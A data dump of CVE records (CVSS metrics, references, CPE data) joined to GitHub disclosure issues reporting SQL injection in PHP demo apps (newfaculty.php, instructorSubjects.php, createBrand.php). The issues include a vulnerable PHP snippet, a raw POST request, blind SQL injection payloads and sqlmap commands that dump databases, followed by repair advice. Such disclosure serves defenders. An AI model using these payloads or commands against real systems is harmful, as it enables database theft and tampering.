"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/9" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266310" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266310" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344699" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344699" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/9
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP newfaculty.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + newfaculty.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'newfaculty.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "name" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="633" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/942c9905-aae1-402c-8b7d-785b2707c818"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "newfaculty.php" file. This vulnerability stems from insufficient user input validation of the "name" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC POST /kccreg/newfaculty.php HTTP/1.1 Host: 192.168.144.199:1217 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 153 Origin: http://192.168.144.199:1217 Connection: close Referer: http://192.168.144.199:1217/kccreg/newfaculty.php Cookie: pma_lang=zh_CN; phpMyAdmin=len9ob4npbvfdq6covmbegt63r; pmaUser-1=%7B%22iv%22%3A%22T%5C%2FCNohNoUS6vPeq7Nu7Zlw%3D%3D%22%2C%22mac%22%3A%22612b6061a48fea2497ec15d24ac758094d001624%22%2C%22payload%22%3A%22oBKb1qokv1s8RyKQorlz4w%3D%3D%22%7D; PHPSESSID=hnl0ppij1sd9vouvkhsg32c1j5; pmaAuth-1=%7B%22iv%22%3A%229HoKmgAu8K5%5C%2FvRe%5C%2FctcrUw%3D%3D%22%2C%22mac%22%3A%22d1b4c1f728f0b917499c499c26c1efc9e4cc99c7%22%2C%22payload%22%3A%22A4x7p0kon2pEBGwcRUcZJJM01WQ6mIgqc1HifbZxU2o%3D%22%7D Upgrade-Insecure-Requests: 1 Priority: u=1 deptid=&name=321&deptid=&address=321&Gender=M&civilstats=Single&deptid=&specialization=321&deptid=&empStats=123&deptid=&email=1231%40w2w.com&savefaculty= ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'name' parameter ## Payload: <img width="310" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/a45ac0ee-1b34-437a-bd54-78e7a4ffd874"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r abc --batch --dbs ``` <img width="308" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/65baa2ee-ad71-4306-8044-05faa411ef04"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP newfaculty.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/9/comments
0
2024-05-26T04:49:51Z
2024-05-26T04:49:51Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/9
2,317,480,857
9
6,040
CVE-2024-5397
2024-05-27T03:15:08.923
A vulnerability classified as critical was found in itsourcecode Online Student Enrollment System 1.0. Affected by this vulnerability is an unknown functionality of the file instructorSubjects.php. The manipulation of the argument instructorId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266311.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/10" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266311" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266311" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344700" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266311" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266311" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.344700" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Lanxiy7th/lx_CVE_report-/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Lanxiy7th", "lx_CVE_report-" ]
# Itsourcecode Online Student Enrollment System Project In PHP instructorSubjects.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Student Enrollment System Project In PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Lanxiy7th ## Vulnerable File + instructorSubjects.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'instructorSubjects.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "instructorId" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="637" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/8db98d65-c62d-4f48-b4ed-541cd2ce0ff6"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "instructorSubjects.php" file. This vulnerability stems from insufficient user input validation of the "instructorId" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'instructorId' parameter ## Payload: <img width="306" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2706ee55-18fe-41d4-8d17-0cd971773e74"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.144.199:1217/kccreg/instructorSubjects.php?instructorId=1" --batch --dbs ``` <img width="307" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/0061af32-cfd4-46cf-8705-95c9390d0fd7"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Student Enrollment System Project In PHP instructorSubjects.php SQL injection
https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/10/comments
0
2024-05-26T04:59:07Z
2024-05-26T04:59:07Z
https://github.com/Lanxiy7th/lx_CVE_report-/issues/10
2,317,483,336
10
6,041
CVE-2024-5515
2024-05-30T13:15:50.247
A vulnerability was found in SourceCodester Stock Management System 1.0. It has been classified as critical. Affected is an unknown function of the file createBrand.php. The manipulation of the argument brandName leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266586 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HaojianWang/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266586" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266586" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.345714" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/HaojianWang/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266586" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266586" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.345714" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:stock_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8F75A0CB-D496-4651-8633-972D8FA69746", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/HaojianWang/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "HaojianWang", "cve" ]
# SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Stock Management System in PHP ## Vendor Homepage + https://www.sourcecodester.com/php/14366/stock-management-system-php.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Wang Haojian ## Vulnerable File + createBrand.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the "createBrand. php" file of the "Inventory Management System" project. The reason for this issue is that the user inputs the 'brandName' from the '$brandName=$$POST ['brandName'] 'and uses it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Vulnerability code snippets ```php <?php require_once 'core.php'; $valid['success'] = array('success' => false, 'messages' => array()); if($_POST) { $brandName = $_POST['brandName']; $brandStatus = $_POST['brandStatus']; $sql = "INSERT INTO brands (brand_name, brand_active, brand_status) VALUES ('$brandName', '$brandStatus', 1)"; if($connect->query($sql) === TRUE) { $valid['success'] = true; $valid['messages'] = "Successfully Added"; } else { $valid['success'] = false; $valid['messages'] = "Error while adding the members"; } $connect->close(); echo json_encode($valid); } // /if $_POST ``` + In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Stock Management System," Wang Haojian discovered a critical SQL injection vulnerability in the `createBrand.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + MySQL >= 5.0.12 AND time-based blind (query SLEEP) ## Vulnerability location: + 'brandName' parameter ## Payload: ```sql brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1 brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1 ``` ```makefile Parameter: brandName (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1 ``` + ![1](https://github.com/HaojianWang/cve/assets/170995980/b666938d-9d38-47ad-8efa-226c2101dff7) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://localhost/stock/php_action/createBrand.php" --data="brandName=11&brandStatus=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump ``` + ![2](https://github.com/HaojianWang/cve/assets/170995980/a0e4495c-fb0b-41f6-b572-e501629ea96a) + ![3](https://github.com/HaojianWang/cve/assets/170995980/5fabd976-d106-4d80-b7da-138cc21f489c) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability
https://api.github.com/repos/HaojianWang/cve/issues/1/comments
0
2024-05-28T04:56:11Z
2024-05-28T04:56:11Z
https://github.com/HaojianWang/cve/issues/1
2,320,120,757
1
6,042
CVE-2024-5516
2024-05-30T14:15:09.277
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file massage.php. The manipulation of the argument bid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266587.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
